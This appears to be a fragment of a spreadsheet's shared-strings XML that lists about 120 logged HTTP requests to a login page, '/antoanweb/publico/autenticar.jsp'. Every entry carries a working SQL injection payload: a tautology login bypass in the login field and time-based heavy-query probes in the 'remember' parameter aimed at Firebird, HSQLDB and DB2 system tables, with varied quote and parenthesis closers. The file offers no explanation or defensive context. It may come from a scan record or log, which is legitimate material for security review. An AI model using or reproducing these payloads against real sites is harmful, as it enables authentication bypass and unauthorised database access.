    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(4969=4969&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((6260=6260&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(((3862=3862&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('yhyv'='yhyv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('prbc'='prbc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('anrl'='anrl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'okzc'='okzc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('fuja'like'fuja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('eepj'like'eepj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('obgq'like'obgq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'qrpt'like'qrpt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("gdxv"="gdxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("eqtl"="eqtl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("tntu"="tntu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"efsz"="efsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and("cpvc"like"cpvc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(("zsfm"like"zsfm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((("zptk"like"zptk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8362=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and"gxtx"like"gxtx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(7771=7771&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((8378=8378&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(((5560=5560&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and('iiqp'='iiqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(('tqtf'='tqtf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((('nlet'='nlet&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and'wkxb'='wkxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and('ybnm'like'ybnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(('vbrj'like'vbrj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((('yoxg'like'yoxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and'fyzm'like'fyzm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and("xmkn"="xmkn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(("cpjk"="cpjk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((("gzob"="gzob&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and"pvst"="pvst&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and("srqc"like"srqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and(("plnm"like"plnm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and((("qilq"like"qilq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6694=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)--and"prwz"like"prwz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(9818=9818&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((1789=1789&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(((6432=6432&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('telb'='telb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('qioz'='qioz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('drys'='drys&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'pjbj'='pjbj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and('vudi'like'vudi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(('sunk'like'sunk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((('mxbp'like'mxbp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and'qozr'like'qozr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("ujbe"="ujbe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("ctoc"="ctoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("vatp"="vatp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"uexb"="uexb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and("eega"like"eega&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and(("wnrn"like"wnrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and((("edfh"like"edfh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8309=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)and"zrbz"like"zrbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(2235=2235&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((9187=9187&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(((2203=2203&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and('eeoa'='eeoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(('ztne'='ztne&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((('iecu'='iecu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and'ggah'='ggah&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and('zcdu'like'zcdu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(('rivx'like'rivx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((('jjfd'like'jjfd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and'updx'like'updx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and("ewix"="ewix&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(("xtii"="xtii&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((("fuzq"="fuzq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and"baap"="baap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and("uqkq"like"uqkq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and(("uhno"like"uhno&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and((("sgsd"like"sgsd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5261=(selectcount(*)fromdomain.domainsast1,domain.columnsast2,domain.tablesast3)--and"joeg"like"joeg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(6631=6631&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((651=651&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(((6696=6696&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('ffsm'='ffsm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('ccve'='ccve&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('ssgr'='ssgr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'ogss'='ogss&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and('ijqc'like'ijqc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(('mhaa'like'mhaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((('doqb'like'doqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and'zyvk'like'zyvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("ewer"="ewer&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("hgir"="hgir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("enjt"="enjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and"jhyi"="jhyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and("lcwu"like"lcwu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and(("njcv"like"njcv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8029=(selectcount(*)fromsysibm.systablesast1,sysibm.systablesast2,sysibm.systablesast3)and((("rdnz"like"rdnz&amp;modo=entrar</t>
  </si>
  <si>
